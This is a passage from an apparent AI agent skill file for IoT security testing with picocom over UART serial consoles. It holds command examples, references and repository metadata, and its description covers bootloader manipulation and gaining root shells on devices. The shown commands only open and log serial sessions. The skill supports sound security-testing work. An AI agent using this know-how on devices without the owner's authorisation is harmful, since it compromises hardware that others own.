--logfile iot_pentest.log /dev/ttyUSB0\n\n# Quiet mode (suppress picocom messages)\npicocom -b 115200 --nolock -q --echo /dev/ttyUSB0\n\n# Run in background for scripted interaction\npicocom -b 115200 --nolock /dev/ttyUSB0 &\n# Then use BashOutput to monitor","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"References","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"picocom documentation","type":"text","marks":[{"type":"link","attrs":{"href":"https://github.com/npat-efault/picocom","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"U-Boot documentation","type":"text","marks":[{"type":"link","attrs":{"href":"https://u-boot.readthedocs.io/","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"IoT pentesting resources and vulnerability databases","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Device-specific documentation and datasheets","type":"text"}]}]}]},{"type":"hr","attrs":{"markup":"---"}}]},"metadata":{"date":"2026-06-05","name":"iot-uart-console-picocom","author":"@skillopedia","source":{"stars":336,"repo_name":"marketplace","origin_url":"https://github.com/aiskillstore/marketplace/blob/HEAD/skills/brownfinesecurity/iot-uart-console-picocom/SKILL.md","repo_owner":"aiskillstore","body_sha256":"9bc99060a4ad5366d98bef9fcc71547d8d0866a63e6ea0bb2d0a1be998f92948","cluster_key":"7d64ac31564992041f220cfeda244f4db568ffce324ff85f878dd62c1ecf9259","clean_bundle":{"format":"clean-skill-bundle-v1","source":"aiskillstore/marketplace/skills/brownfinesecurity/iot-uart-console-picocom/SKILL.md","attachments":[{"id":"18b4ea1f-ab73-5a1e-940f-e8a75166a512","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/18b4ea1f-ab73-5a1e-940f-e8a75166a512/attachment.md","path":"OBSERVING_SESSIONS.md","size":9102,"sha256":"770327f648f963d4c3a7c848c58df47dab8ac166bbb5b404c91947837b22e1b0","contentType":"text/markdown; charset=utf-8"},{"id":"014d6741-e18c-5dd8-8b46-85a5c64ff863","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/014d6741-e18c-5dd8-8b46-85a5c64ff863/attachment.md","path":"examples.md","size":11325,"sha256":"4a68b933886e6ab85e3228a240ac3cbb008e5694c4cde944f5555919f1564c02","contentType":"text/markdown; charset=utf-8"},{"id":"36061498-320c-58f5-86b7-80abd1f32147","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/36061498-320c-58f5-86b7-80abd1f32147/attachment.py","path":"serial_helper.py","size":17030,"sha256":"42a43acf23b7bebd21130ba22dfe2521a0adb97dafd73ac3ee1144af205ad94d","contentType":"text/x-python; charset=utf-8"},{"id":"46af2fb4-86e3-59c1-b491-c987f6e2e39f","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/46af2fb4-86e3-59c1-b491-c987f6e2e39f/attachment.json","path":"skill-report.json","size":9178,"sha256":"07340b78ec43240812ad525354ad5ac8f578494297f8ecbae387b8f4d5d0986a","contentType":"application/json; charset=utf-8"}],"bundle_sha256":"6fb5602a04670d12d6075ebfe87e2f4b191ddce7e7f6cc995584d01df7eb2c0a","attachment_count":4,"text_attachments":4,"attachment_storage":"skillopedia-attachments-v1","binary_attachments":0,"excluded_attachments":[]},"cluster_size":1,"skill_md_path":"skills/brownfinesecurity/iot-uart-console-picocom/SKILL.md","import_metadata":{"date":"2026-06-05","author":"@skillopedia","version":"v1","category":"security","category_label":"Security"},"exact_dupes_collapsed_into_this":0},"version":"v1","category":"security","import_tag":"clean-skills-v1","description":"Use picocom to interact with IoT device UART consoles for pentesting operations including device enumeration, vulnerability discovery, bootloader manipulation, and gaining root shells. Use when the user needs to interact with embedded devices, IoT hardware, or serial consoles."}},"renderedAt":1782980481445}

IoT UART Console (picocom) This skill enables interaction with IoT device UART consoles using picocom for security testing and penetration testing operations. It supports bootloader interaction, shell access (with or without authentication), device enumeration, and vulnerability discovery. Prerequisites - picocom must be installed on the system - Python 3 with pyserial library ( on Arch, or ) - UART connection to the target device (USB-to-serial adapter, FTDI cable, etc.) - Appropriate permissions to access serial devices (typically /dev/ttyUSB or /dev/ttyACM ) Recommended Approach: Serial He…